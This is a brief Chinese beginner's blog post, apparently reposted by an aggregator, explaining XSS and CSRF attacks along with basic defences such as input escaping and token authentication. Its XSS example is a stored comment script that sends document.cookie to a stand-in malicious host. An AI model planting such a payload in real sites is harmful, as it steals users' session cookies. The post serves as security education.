XSS攻击和CSRF 攻击
Posted 小龙虾
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS攻击和CSRF 攻击相关的知识,希望对你有一定的参考价值。
前言: 最近在看web网络安全的知识, 刚好看到了 XSS 和CSRF , 就上来记录下, 也算加强下自己的理解,理解不到位的地方请各位大神多多指正啊 !
XSS: 跨站脚本攻击 ; 这个还是比较好理解哈 ! 就是在你的网站上植入一些恶意的脚本,通过一些脚本 可以把想要的信息偷出来哈 。
举个例子: 比如你去某博客上写评论。评论写了这样<script>window.open(\'www.eyi.com?cookie\' +document.cookie)</script> 一段代码, 然后存到数据库;当别人去看你这个评论的时候 ,直接从服务器下载下来,前端如果直接解析的话, 就会把你的cookie的相关信息偷出来 。
那如何避免你, 一般都是给用用输入的信息进行转义。切记 不能直接用js进行解析。
CSRF:跨站请求伪造 。 这个主要是利用了浏览器会自动带上cookie 的机制。目前很多服务还是用cookie 来做身份认证的 。
举个列子: 当你在A网站登入了之后。 那每次请求A网站,浏览器会自动带上cookie做身份认证, 服务会返回数据。 如果在当前浏览器你有打开的第三方网站, 如果这网站也有接口是访问A网站的 , 那么浏览器也会自动带上cookie,这个时候服务器也会把这个请求当做你登入的请求,然后结果可想而知了 。。。。。
如何避免:使用token 做身份认证。或是用签名也可以了。
好了! 今天就写到这里 , 喜欢的同学点个赞! 写的不好的地方 还望各位大佬指正哈
以上是关于XSS攻击和CSRF 攻击的主要内容,如果未能解决你的问题,请参考以下文章